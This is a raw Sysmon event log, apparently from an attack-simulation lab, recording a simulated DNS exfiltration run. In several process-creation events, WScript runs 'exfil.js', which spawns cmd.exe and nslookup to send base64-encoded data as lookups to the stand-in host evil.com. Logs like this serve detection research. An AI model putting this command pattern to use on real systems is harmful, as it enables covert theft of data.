14:21:58.243{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.227{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1906-629A-2E47-000000005F02}3140C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.227{2E1864BB-1906-629A-2C47-000000005F02}66162632C:\Windows\system32\cmd.exe{2E1864BB-1906-629A-2E47-000000005F02}3140C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.242{2E1864BB-1906-629A-2E47-000000005F02}3140C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1906-629A-2C47-000000005F02}6616C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfpyp.tmp 2>&1 354300x8000000000000000217769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.029{00000000-0000-0000-0000-000000000000}7300<unknown process>-udptruefalse127.0.0.1-51484-false127.0.0.1-53domain 354300x8000000000000000217768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.029{00000000-0000-0000-0000-000000000000}7300<unknown process>-udptruefalse127.0.0.1-51483-false127.0.0.1-53domain 354300x8000000000000000217767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.855{00000000-0000-0000-0000-000000000000}5824<unknown process>-udpfalsefalse127.0.0.1-51480-false127.0.0.1-53domain 354300x8000000000000000217766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.855{00000000-0000-0000-0000-000000000000}5824<unknown process>-udptruefalse127.0.0.1-51480-false127.0.0.1-53domain 354300x8000000000000000217765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.695{00000000-0000-0000-0000-000000000000}3536<unknown process>-udpfalsefalse127.0.0.1-51473-false127.0.0.1-53domain 354300x8000000000000000217764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.357{00000000-0000-0000-0000-000000000000}7384<unknown process>-udpfalsefalse127.0.0.1-51465-false127.0.0.1-53domain 354300x8000000000000000217763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.357{00000000-0000-0000-0000-000000000000}7384<unknown process>-udpfalsefalse127.0.0.1-51463-false127.0.0.1-53domain 354300x8000000000000000217762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.234{00000000-0000-0000-0000-000000000000}5628<unknown process>-udptruefalse127.0.0.1-51461-false127.0.0.1-53domain 10341000x8000000000000000217761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.212{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1906-629A-2D47-000000005F02}3396C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.212{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1906-629A-2D47-000000005F02}3396C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.212{2E1864BB-1906-629A-2D47-000000005F02}33967456C:\Windows\system32\conhost.exe{2E1864BB-1906-629A-2C47-000000005F02}6616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.206{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1906-629A-2D47-000000005F02}3396C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.190{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.190{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.190{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.190{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.190{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1906-629A-2C47-000000005F02}6616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.190{2E1864BB-18E0-629A-6742-000000005F02}39765928C:\Windows\System32\WScript.exe{2E1864BB-1906-629A-2C47-000000005F02}6616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.198{2E1864BB-1906-629A-2C47-000000005F02}6616C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfpyp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.190{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvbxn.tmpMD5=13B747063E29DDAFB1C25744F690BAA2,SHA256=FFD02DE1BE5A2F9B37BEA75BF31D9F7DC3AB49C7A69DB9B5050D219E835321C0,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000217749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.159{00000000-0000-0000-0000-000000000000}4156evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.084{00000000-0000-0000-0000-000000000000}7768evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.983{00000000-0000-0000-0000-000000000000}7488evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.883{00000000-0000-0000-0000-000000000000}2512evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.789{00000000-0000-0000-0000-000000000000}5776evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.683{00000000-0000-0000-0000-000000000000}4176evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.573{00000000-0000-0000-0000-000000000000}6116evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.484{00000000-0000-0000-0000-000000000000}2536evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.410{00000000-0000-0000-0000-000000000000}4280evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.335{00000000-0000-0000-0000-000000000000}3832evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.253{00000000-0000-0000-0000-000000000000}5380evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.183{00000000-0000-0000-0000-000000000000}7868evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000217737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.159{2E1864BB-1906-629A-2A47-000000005F02}11365556C:\Windows\system32\conhost.exe{2E1864BB-1906-629A-2B47-000000005F02}7280C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.159{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1906-629A-2B47-000000005F02}7280C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.159{2E1864BB-1906-629A-2947-000000005F02}42324148C:\Windows\system32\cmd.exe{2E1864BB-1906-629A-2B47-000000005F02}7280C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.159{2E1864BB-1906-629A-2B47-000000005F02}7280C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1906-629A-2947-000000005F02}4232C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvbxn.tmp 2>&1 10341000x8000000000000000217729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.128{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1906-629A-2A47-000000005F02}1136C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.128{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1906-629A-2A47-000000005F02}1136C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.128{2E1864BB-1906-629A-2A47-000000005F02}11365556C:\Windows\system32\conhost.exe{2E1864BB-1906-629A-2947-000000005F02}4232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.112{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1906-629A-2A47-000000005F02}1136C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 